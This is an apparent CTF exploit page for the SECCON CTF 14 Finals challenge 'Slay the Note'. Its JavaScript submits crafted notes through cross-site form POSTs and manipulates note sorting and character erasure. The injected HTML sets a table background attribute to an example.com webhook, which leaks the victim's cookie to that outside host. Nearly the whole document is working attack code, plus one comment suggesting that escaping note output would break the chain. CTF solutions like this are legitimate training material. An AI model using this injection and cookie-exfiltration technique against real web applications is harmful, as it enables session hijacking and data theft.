SECCON CTF 14 Finals - Slay the Note
| <body> | |
| <script> | |
| (async () => { | |
| const target = 'http://web:3000'; | |
| const webhook = 'http://example.com/log.php'; | |
| const submit = note => { | |
| return new Promise(r => { | |
| const w = window.open('b.html'); | |
| w.onload = async () => { | |
| w.document.body.innerHTML = `<form method="POST" action="${target}/new"><input type="text" name="note"><input type="submit"></form>`; | |
| w.document.querySelector('input[name=note]').value = note; | |
| w.document.querySelector('form').submit(); | |
| setTimeout(() => { w.close(); r(); }, 250); | |
| }; | |
| }); | |
| }; | |
| const keshitai = '></table></article>'; | |
| await submit('zzzzzzzzzzzzzzz"'); // this note ends up toward the back and closes the background attribute | |
| await submit('|' + '"'.repeat(keshitai.length)); // this note comes first and erases the string that follows the Cookie (= keshitai, romanized Japanese for "want to erase") | |
| await submit(`| z background="${webhook}?| <table></table>`); // in the end, <table> comes first, followed by background | |
| for (let i = 0; i < keshitai.length; i++) { | |
| await new Promise(r => { | |
| const w = window.open(target + '/abc'); // this erases the characters of keshitai | |
| setTimeout(() => { w.close(); r(); }, 100); | |
| }); | |
| } | |
| await submit('a'); // this triggers the sort | |
| window.open(target); // leak! NOTE(review): the script relies on note text reaching the page as raw markup and on cross-site form POSTs being accepted; HTML-escaping notes on output would presumably break the chain (inferred from this script, confirm against the challenge server code) | |
| })(); | |
| </script> | |
| </body> |